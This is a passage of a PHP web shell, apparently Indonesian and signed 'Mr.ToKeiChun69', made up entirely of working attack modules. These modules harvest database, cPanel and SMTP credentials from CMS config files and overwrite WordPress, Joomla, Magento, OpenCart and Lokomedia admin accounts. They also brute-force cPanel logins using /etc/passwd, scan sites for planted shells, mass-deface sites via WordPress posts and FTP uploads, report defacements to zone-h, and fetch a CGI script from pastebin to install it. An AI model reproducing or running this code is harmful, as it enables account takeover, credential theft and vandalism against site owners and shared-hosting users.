  1997. $scan_conf = scandir($conf);
  1998. foreach($scan_conf as $file_conf) {
  1999. if(!is_file("$conf/$file_conf")) continue;
  2000. $config = file_get_contents("$conf/$file_conf");
  2001. if(preg_match("/JConfig|joomla/",$config)) {
  2002. $dbhost = ambilkata($config,"host = '","'");
  2003. $dbuser = ambilkata($config,"user = '","'");
  2004. $dbpass = ambilkata($config,"password = '","'");
  2005. $dbname = ambilkata($config,"db = '","'");
  2006. $dbprefix = ambilkata($config,"dbprefix = '","'");
  2007. $prefix = $dbprefix."users";
  2008. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2009. $db = mysql_select_db($dbname);
  2010. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2011. $result = mysql_fetch_array($q);
  2012. $id = $result['id'];
  2013. $site = ambilkata($config,"sitename = '","'");
  2014. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  2015. echo "Config => ".$file_conf."<br>";
  2016. echo "CMS => Joomla<br>";
  2017. if($site == '') {
  2018. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2019. } else {
  2020. echo "Sitename => $site<br>";
  2021. }
  2022. if(!$update OR !$conn OR !$db) {
  2023. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2024. } else {
  2025. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2026. }
  2027. mysql_close($conn);
  2028. } elseif(preg_match("/WordPress/",$config)) {
  2029. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2030. $dbuser = ambilkata($config,"DB_USER', '","'");
  2031. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2032. $dbname = ambilkata($config,"DB_NAME', '","'");
  2033. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2034. $prefix = $dbprefix."users";
  2035. $option = $dbprefix."options";
  2036. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2037. $db = mysql_select_db($dbname);
  2038. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2039. $result = mysql_fetch_array($q);
  2040. $id = $result[ID];
  2041. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2042. $result2 = mysql_fetch_array($q2);
  2043. $target = $result2[option_value];
  2044. if($target == '') {
  2045. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2046. } else {
  2047. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  2048. }
  2049. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  2050. echo "Config => ".$file_conf."<br>";
  2051. echo "CMS => Wordpress<br>";
  2052. echo $url_target;
  2053. if(!$update OR !$conn OR !$db) {
  2054. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2055. } else {
  2056. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2057. }
  2058. mysql_close($conn);
  2059. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  2060. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  2061. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  2062. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  2063. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  2064. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  2065. $prefix = $dbprefix."admin_user";
  2066. $option = $dbprefix."core_config_data";
  2067. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2068. $db = mysql_select_db($dbname);
  2069. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2070. $result = mysql_fetch_array($q);
  2071. $id = $result[user_id];
  2072. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  2073. $result2 = mysql_fetch_array($q2);
  2074. $target = $result2[value];
  2075. if($target == '') {
  2076. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2077. } else {
  2078. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  2079. }
  2080. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2081. echo "Config => ".$file_conf."<br>";
  2082. echo "CMS => Magento<br>";
  2083. echo $url_target;
  2084. if(!$update OR !$conn OR !$db) {
  2085. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2086. } else {
  2087. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2088. }
  2089. mysql_close($conn);
  2090. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  2091. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  2092. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  2093. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  2094. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  2095. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  2096. $prefix = $dbprefix."user";
  2097. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2098. $db = mysql_select_db($dbname);
  2099. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  2100. $result = mysql_fetch_array($q);
  2101. $id = $result[user_id];
  2102. $target = ambilkata($config,"HTTP_SERVER', '","'");
  2103. if($target == '') {
  2104. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2105. } else {
  2106. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  2107. }
  2108. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  2109. echo "Config => ".$file_conf."<br>";
  2110. echo "CMS => OpenCart<br>";
  2111. echo $url_target;
  2112. if(!$update OR !$conn OR !$db) {
  2113. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2114. } else {
  2115. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2116. }
  2117. mysql_close($conn);
  2118. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  2119. $dbhost = ambilkata($config,'server = "','"');
  2120. $dbuser = ambilkata($config,'username = "','"');
  2121. $dbpass = ambilkata($config,'password = "','"');
  2122. $dbname = ambilkata($config,'database = "','"');
  2123. $prefix = "users";
  2124. $option = "identitas";
  2125. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2126. $db = mysql_select_db($dbname);
  2127. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  2128. $result = mysql_fetch_array($q);
  2129. $target = $result[alamat_website];
  2130. if($target == '') {
  2131. $target2 = $result[url];
  2132. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2133. if($target2 == '') {
  2134. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2135. } else {
  2136. $cek_login3 = file_get_contents("$target2/adminweb/");
  2137. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  2138. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  2139. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  2140. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  2141. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  2142. } else {
  2143. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2144. }
  2145. }
  2146. } else {
  2147. $cek_login = file_get_contents("$target/adminweb/");
  2148. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  2149. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  2150. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  2151. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  2152. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  2153. } else {
  2154. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  2155. }
  2156. }
  2157. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  2158. echo "Config => ".$file_conf."<br>";
  2159. echo "CMS => Lokomedia<br>";
  2160. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  2161. echo $url_target2;
  2162. } else {
  2163. echo $url_target;
  2164. }
  2165. if(!$update OR !$conn OR !$db) {
  2166. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2167. } else {
  2168. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2169. }
  2170. mysql_close($conn);
  2171. }
  2172. }
  2173. }
  2174. } else {
  2175. echo "<center>
  2176. <h1>Auto Edit User Config</h1>
  2177. <form method='post'>
  2178. DIR Config: <br>
  2179. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2180. Set User & Pass: <br>
  2181. <input type='text' name='user_baru' value='root@1337' placeholder='user_baru'><br>
  2182. <input type='text' name='pass_baru' value='root@1337' placeholder='pass_baru'><br>
  2183. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  2184. </form>
  2185. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2186. ";
  2187. }
  2188. }elseif($_GET['do'] == 'shelscan') {
  2189. echo'<center><h2>Shell Finder</h2>
  2190. <form action="" method="post">
  2191. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
  2192. <br>
  2193. <input name="scan" value="Start Scaning" style="width: 215px;" type="submit">
  2194. </form><br>';
  2195. if (isset($_POST["scan"])) {
  2196. $url = $_POST['traget'];
  2197. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
  2198. echo "Result :<br />";
  2199. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
  2200. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
  2201. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
  2202. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
  2203. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
  2204. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
  2205. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
  2206. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
  2207. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
  2208. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
  2209. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
  2210. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
  2211. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
  2212. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
  2213. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
  2214. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
  2215. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
  2216. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
  2217. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
  2218. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
  2219. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
  2220. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
  2221. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
  2222. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
  2223. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
  2224. foreach ($shells as $shell){
  2225. $headers = get_headers("$url$shell"); //
  2226. if (eregi('200', $headers[0])) {
  2227. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done :D</span><br /><br/><br/>"; //
  2228. $dz = fopen('shells.txt', 'a+');
  2229. $suck = "$url$shell";
  2230. fwrite($dz, $suck."\n");
  2231. }
  2232. }
  2233. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
  2234. }
  2235.  
  2236. }
  2237. elseif($_GET['do'] == 'cpanel') {
  2238. if($_POST['crack']) {
  2239. $usercp = explode("\r\n", $_POST['user_cp']);
  2240. $passcp = explode("\r\n", $_POST['pass_cp']);
  2241. $i = 0;
  2242. foreach($usercp as $ucp) {
  2243. foreach($passcp as $pcp) {
  2244. if(@mysql_connect('localhost', $ucp, $pcp)) {
  2245. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2246. } else {
  2247. $_SESSION[$ucp] = "1";
  2248. $_SESSION[$pcp] = "1";
  2249. $i++;
  2250. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  2251. }
  2252. }
  2253. }
  2254. }
  2255. if($i == 0) {
  2256. } else {
  2257. echo "<br>Nemu ".$i." Cpanel by <font color=lime>Mr.ToKeiChun69</font>";
  2258. }
  2259. } else {
  2260. echo "<center>
  2261. <form method='post'>
  2262. USER: <br>
  2263. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  2264. $_usercp = fopen("/etc/passwd","r");
  2265. while($getu = fgets($_usercp)) {
  2266. if($getu == '' || !$_usercp) {
  2267. echo "<font color=red>Can't read /etc/passwd</font>";
  2268. } else {
  2269. preg_match_all("/(.*?):x:/", $getu, $u);
  2270. foreach($u[1] as $user_cp) {
  2271. if(is_dir("/home/$user_cp/public_html")) {
  2272. echo "$user_cp\n";
  2273. }
  2274. }
  2275. }
  2276. }
  2277. echo "</textarea><br>
  2278. PASS: <br>
  2279. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  2280. function cp_pass($dir) {
  2281. $pass = "";
  2282. $dira = scandir($dir);
  2283. foreach($dira as $dirb) {
  2284. if(!is_file("$dir/$dirb")) continue;
  2285. $ambil = file_get_contents("$dir/$dirb");
  2286. if(preg_match("/WordPress/", $ambil)) {
  2287. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2288. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  2289. $pass .= ambilkata($ambil,"password = '","'")."\n";
  2290. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  2291. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2292. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  2293. $pass .= ambilkata($ambil,'password = "','"')."\n";
  2294. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  2295. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2296. } elseif(preg_match("/client/", $ambil)) {
  2297. preg_match("/password=(.*)/", $ambil, $pass1);
  2298. if(preg_match('/"/', $pass1[1])) {
  2299. $pass1[1] = str_replace('"', "", $pass1[1]);
  2300. $pass .= $pass1[1]."\n";
  2301. }
  2302. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  2303. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2304. }
  2305. }
  2306. echo $pass;
  2307. }
  2308. $cp_pass = cp_pass($dir);
  2309. echo $cp_pass;
  2310. echo "</textarea><br>
  2311. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  2312. </form>
  2313. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  2314. }
  2315. } elseif($_GET['do'] == 'smtp') {
  2316. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  2317. function scj($dir) {
  2318. $dira = scandir($dir);
  2319. foreach($dira as $dirb) {
  2320. if(!is_file("$dir/$dirb")) continue;
  2321. $ambil = file_get_contents("$dir/$dirb");
  2322. $ambil = str_replace("$", "", $ambil);
  2323. if(preg_match("/JConfig|joomla/", $ambil)) {
  2324. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  2325. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  2326. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  2327. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  2328. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  2329. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  2330. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  2331. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  2332. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  2333. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  2334. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  2335. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  2336. }
  2337. }
  2338. }
  2339. $smpt_hunter = scj($dir);
  2340. echo $smpt_hunter;
  2341. } elseif($_GET['do'] == 'auto_wp') {
  2342. if($_POST['hajar']) {
  2343. $title = htmlspecialchars($_POST['new_title']);
  2344. $pn_title = str_replace(" ", "-", $title);
  2345. if($_POST['cek_edit'] == "Y") {
  2346. $script = $_POST['edit_content'];
  2347. } else {
  2348. $script = $title;
  2349. }
  2350. $conf = $_POST['config_dir'];
  2351. $scan_conf = scandir($conf);
  2352. foreach($scan_conf as $file_conf) {
  2353. if(!is_file("$conf/$file_conf")) continue;
  2354. $config = file_get_contents("$conf/$file_conf");
  2355. if(preg_match("/WordPress/", $config)) {
  2356. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2357. $dbuser = ambilkata($config,"DB_USER', '","'");
  2358. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2359. $dbname = ambilkata($config,"DB_NAME', '","'");
  2360. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2361. $prefix = $dbprefix."posts";
  2362. $option = $dbprefix."options";
  2363. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2364. $db = mysql_select_db($dbname);
  2365. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  2366. $result = mysql_fetch_array($q);
  2367. $id = $result[ID];
  2368. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2369. $result2 = mysql_fetch_array($q2);
  2370. $target = $result2[option_value];
  2371. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  2372. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  2373. echo "<div style='margin: 5px auto;'>";
  2374. if($target == '') {
  2375. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  2376. } else {
  2377. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  2378. }
  2379. if(!$update OR !$conn OR !$db) {
  2380. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  2381. } else {
  2382. echo "<font color=lime>sukses di ganti.</font><br>";
  2383. }
  2384. echo "</div>";
  2385. mysql_close($conn);
  2386. }
  2387. }
  2388. } else {
  2389. echo "<center>
  2390. <h1>Auto Edit Title+Content WordPress</h1>
  2391. <form method='post'>
  2392. DIR Config: <br>
  2393. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2394. Set Title: <br>
  2395. <input type='text' name='new_title' value='Hacked By Mr.ToKeiChun69' placeholder='New Title'><br><br>
  2396. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  2397. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  2398. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  2399. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  2400. </form>
  2401. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2402. ";
  2403. }
  2404. } elseif($_GET['do'] == 'zoneh') {
  2405. if($_POST['submit']) {
  2406. $domain = explode("\r\n", $_POST['url']);
  2407. $nick = $_POST['nick'];
  2408. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  2409. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  2410. function zoneh($url,$nick) {
  2411. $ch = curl_init("http://www.zone-h.com/notify/single");
  2412. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2413. curl_setopt($ch, CURLOPT_POST, true);
  2414. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  2415. return curl_exec($ch);
  2416. curl_close($ch);
  2417. }
  2418. foreach($domain as $url) {
  2419. $zoneh = zoneh($url,$nick);
  2420. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  2421. echo "$url -> <font color=lime>OK</font><br>";
  2422. } else {
  2423. echo "$url -> <font color=red>ERROR</font><br>";
  2424. }
  2425. }
  2426. } else {
  2427. echo "<center><form method='post'>
  2428. <u>Defacer</u>: <br>
  2429. <input type='text' name='nick' size='50' value='Mr.ToKeiChun69'><br>
  2430. <u>Domains</u>: <br>
  2431. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  2432. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  2433. </form>";
  2434. }
  2435. echo "</center>";
  2436. }elseif($_GET['do'] == 'cpftp_auto') {
  2437. if($_POST['crack']) {
  2438. $usercp = explode("\r\n", $_POST['user_cp']);
  2439. $passcp = explode("\r\n", $_POST['pass_cp']);
  2440. $i = 0;
  2441. foreach($usercp as $ucp) {
  2442. foreach($passcp as $pcp) {
  2443. if(@mysql_connect('localhost', $ucp, $pcp)) {
  2444. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  2445. } else {
  2446. $_SESSION[$ucp] = "1";
  2447. $_SESSION[$pcp] = "1";
  2448. if($ucp == '' || $pcp == '') {
  2449. //
  2450. } else {
  2451. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  2452. $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  2453. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  2454. if((!$ftp_login) || (!$ftp_conn)) {
  2455. echo "[+] <font color=red>Login Gagal</font><br><br>";
  2456. } else {
  2457. echo "[+] <font color=lime>Login Sukses</font><br>";
  2458. $fi = htmlspecialchars($_POST['file_deface']);
  2459. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  2460. if($deface) {
  2461. $i++;
  2462. echo "[+] <font color=lime>Deface Sukses</font><br>";
  2463. if(function_exists('posix_getpwuid')) {
  2464. $domain_cp = file_get_contents("/etc/named.conf");
  2465. if($domain_cp == '') {
  2466. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  2467. } else {
  2468. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  2469. foreach($domains_cp[1] as $dj) {
  2470. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2471. $user_cp_url = $user_cp_url['name'];
  2472. if($user_cp_url == $ucp) {
  2473. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  2474. break;
  2475. }
  2476. }
  2477. }
  2478. } else {
  2479. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  2480. }
  2481. } else {
  2482. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  2483. }
  2484. }
  2485. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  2486. }
  2487. }
  2488. }
  2489. }
  2490. }
  2491. if($i == 0) {
  2492. } else {
  2493. echo "<br>Sukses Deface ".$i." Cpanel by <font color=lime>Mr.ToKeiChun69.</font>";
  2494. }
  2495. } else {
  2496. echo "<center>
  2497. <form method='post'>
  2498. Filename: <br>
  2499. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  2500. Deface Page: <br>
  2501. <input type='text' name='deface' placeholder='http://www.web-yang-udah-do-deface.com/filemu.php' style='width: 450px;'><br>
  2502. USER: <br>
  2503. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  2504. $_usercp = fopen("/etc/passwd","r");
  2505. while($getu = fgets($_usercp)) {
  2506. if($getu == '' || !$_usercp) {
  2507. echo "<font color=red>Can't read /etc/passwd</font>";
  2508. } else {
  2509. preg_match_all("/(.*?):x:/", $getu, $u);
  2510. foreach($u[1] as $user_cp) {
  2511. if(is_dir("/home/$user_cp/public_html")) {
  2512. echo "$user_cp\n";
  2513. }
  2514. }
  2515. }
  2516. }
  2517. echo "</textarea><br>
  2518. PASS: <br>
  2519. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  2520. function cp_pass($dir) {
  2521. $pass = "";
  2522. $dira = scandir($dir);
  2523. foreach($dira as $dirb) {
  2524. if(!is_file("$dir/$dirb")) continue;
  2525. $ambil = file_get_contents("$dir/$dirb");
  2526. if(preg_match("/WordPress/", $ambil)) {
  2527. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2528. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  2529. $pass .= ambilkata($ambil,"password = '","'")."\n";
  2530. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  2531. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2532. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  2533. $pass .= ambilkata($ambil,'password = "','"')."\n";
  2534. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  2535. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2536. } elseif(preg_match("/client/", $ambil)) {
  2537. preg_match("/password=(.*)/", $ambil, $pass1);
  2538. if(preg_match('/"/', $pass1[1])) {
  2539. $pass1[1] = str_replace('"', "", $pass1[1]);
  2540. $pass .= $pass1[1]."\n";
  2541. }
  2542. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  2543. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2544. }
  2545. }
  2546. echo $pass;
  2547. }
  2548. $cp_pass = cp_pass($dir);
  2549. echo $cp_pass;
  2550. echo "</textarea><br>
  2551. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  2552. </form>
  2553. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  2554. }
  2555. } elseif($_GET['do'] == 'cgi') {
  2556. $cgi_dir = mkdir('cgi', 0755);
  2557. $file_cgi = "cgi/cgi.izo";
  2558. $isi_htcgi = "AddHandler cgi-script .izo";
  2559. $htcgi = fopen(".htaccess", "w");
  2560. fwrite($htcgi, $isi_htcgi);
  2561. fclose($htcgi);
  2562. $cgi_script = getsource("https://pastebin.com/raw.php?i=amaDeGWf");
  2563. $cgi = fopen($file_cgi, "w");
  2564. fwrite($cgi, $cgi_script);
  2565. fclose($cgi);
  2566. chmod($file_cgi, 0755);
